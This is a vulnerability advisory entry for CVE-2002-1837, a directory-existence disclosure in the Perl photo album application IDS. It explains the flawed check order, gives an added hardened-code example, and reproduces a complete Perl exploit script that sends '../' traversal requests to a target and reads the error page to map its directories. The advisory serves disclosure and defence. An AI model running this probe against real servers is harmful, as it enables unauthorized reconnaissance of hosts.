Image Display System Directory Existence Disclosure Vulnerability


Vulnerability ID: 1106753 Vulnerability type: Configuration error
Published: 2002-05-28 Updated: 2005-10-20
CVE ID: CVE-2002-1837
CNNVD-ID: CNNVD-200212-786
Platform: CGI CVSS score: 5.0
|Vulnerability source
https://www.exploit-db.com/exploits/21487
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-786
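|Vulnerability details
IDS (Image Display System) is a web-based photo album application written in Perl and maintained by Ashley M. Kirchner. IDS does not correctly handle user-submitted requests, which lets a remote attacker obtain path information about the host. An attacker can submit a request whose directory and album name contain '../' sequences, causing IDS to return an error message that reveals whether the directory exists; the attacker can use this information to further attack the system. The problem lies in the following handling code:

idsShared.pm::getAlbumToDisplay()
=================================
if ($albumtodisplay ne '/' && !-e $ppath . "albums/$albumtodisplay") { # does this album exist?
    bail("Sorry, the album \"$albumtodisplay\" doesn't exist: $!");
}
if ($albumtodisplay =~ /\.\./) { # hax0r protection...
    bail("Sorry, invalid directory name: $!");
}

The existence test runs before the '..' check, so a traversal path that exists produces the "invalid directory name" error while one that does not exist produces the "doesn't exist" error.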
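An added example, not code from the IDS project or the original advisory: a hardened form of the check above that validates the album name before any filesystem test and returns one generic message for every rejection, so the response no longer distinguishes existing from non-existing paths. The `check_album` helper, the character allow-list and the temporary directory layout are assumptions made for illustration.

```perl
#!/usr/bin/perl
# Added example: hardened variant of the album check (not the IDS project's code).
use strict;
use warnings;
use File::Temp qw(tempdir);
use File::Path qw(make_path);

# One message for every rejection, so the reply never depends on
# what exists on disk outside the album tree.
my $GENERIC = "Sorry, that album is not available.";

# Hypothetical helper: returns (1, undef) if the album may be shown,
# (0, message) otherwise. $ppath is the base path, as in the original code.
sub check_album {
    my ($ppath, $album) = @_;

    # Normalise: drop leading/trailing slashes; an empty name is the root album.
    (my $name = $album) =~ s{\A/+|/+\z}{}g;
    return (1, undef) if $name eq '';

    # 1. Validate the name BEFORE any filesystem test (assumed allow-list).
    for my $seg (split m{/}, $name, -1) {
        return (0, $GENERIC) if $seg eq '.' || $seg eq '..';
        return (0, $GENERIC) unless $seg =~ /\A[A-Za-z0-9 _.-]+\z/;
    }

    # 2. Only now touch the disk, and only below albums/.
    return (0, $GENERIC) unless -d $ppath . "albums/$name";
    return (1, undef);
}

# Constructed demo layout: one real album in a temporary directory.
my $ppath = tempdir(CLEANUP => 1) . "/";
make_path($ppath . "albums/holiday");

# Constructed sample requests: a valid album, a missing album, and two
# traversal names (one pointing at a path that exists, one that does not).
for my $req ("holiday", "missing", "/../../../etc", "/../../../no-such-dir") {
    my ($ok, $msg) = check_album($ppath, $req);
    printf "%-24s => %s\n", $req, $ok ? "OK" : $msg;
}
```

Both traversal requests and the missing album receive the identical generic message, which removes the signal the original error pages leaked.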
|Exploit
source: http://www.securityfocus.com/bid/4870/info

IDS (Image Display System) is a web-based photo album application written in Perl. IDS is freely available and is maintained by Ashley M. Kirchner.

Users can confirm the existence and location of various directories residing on the IDS host. This is accomplished when a request for a directory and album name is sent to the host containing numerous '../' character sequences. The error page returned will indicate to the attacker whether the specified path is a valid directory or not. 

#!/usr/bin/perl -w
#
# ids-inform.pl (05/27/2002)
#
# Image Display System 0.8x Information Disclosure Exploit.
# Checks for existance of specified directory.
#
# By: isox [[email protected]]
#
#
# usage: self explanitory
#
# my spelling: bad
#
# Hi Cody, You should be proud, I coded for you!
# Hi YpCat, Your perl is k-rad and pheersom.
#
#######
# URL #
#######
# http://0xc0ffee.com
# http://hhp-programming.net
#
#
#################
# Advertisement #
#################
#
# Going to Defcon X this year?  Well come to the one and only Dennys at Defcon breakfast.
# This is quickly becoming a yearly tradition put on by isox.  Check 0xc0ffee.com for
# more information.
#

$maxdepth = 30;

&Banner;

if ($#ARGV < 3) {
  die("Usage $0 <directory> <http://host/path/to/index.cgi> <host> <port>\n");
}

for($t=0; $t<$maxdepth; $t++) {
  $dotdot = "$dotdot" . "/..";
}

$query = "GET $ARGV[1]" . "?mode=album&album=$dotdot/$ARGV[0]\n\n";
$blahblah = &Directory($query, $ARGV[2], $ARGV[3]);

if($blahblah =~ /Sorry, invalid directory name/) {
  print("$ARGV[0] Exists.\n");
} else {
  print("$ARGV[0] Does Not Exist.\n");
}

exit 0;




sub Banner {
  print("IDS Information Disclosure Exploit\n");
  print("Written by isox [[email\@protected]]\n\n");
}


sub Directory {
  use IO::Socket::INET;

  my($query, $host, $port) = @_;

  $sock = new IO::Socket::INET (
            PeerAddr => $host,
            PeerPort => $port,
            Timeout => 8,
            Proto => 'tcp'
          );

  if(!$sock) {
    die("sock: timed out\n");
  }


  print $sock $query;
  read($sock, $buf, 8192);
  close($sock);

  return $buf;
}

<-- EOF -->
|References

Source: BID
Name: 4870
Link: http://www.securityfocus.com/bid/4870
Source: XF
Name: ids-dir-existence(9201)
Link: http://www.iss.net/security_center/static/9201.php
Source: ids.sourceforge.net
Link: http://ids.sourceforge.net/ChangeLog.html
Source: NSFOCUS
Name: 2881
Link: http://www.nsfocus.net/vulndb/2881
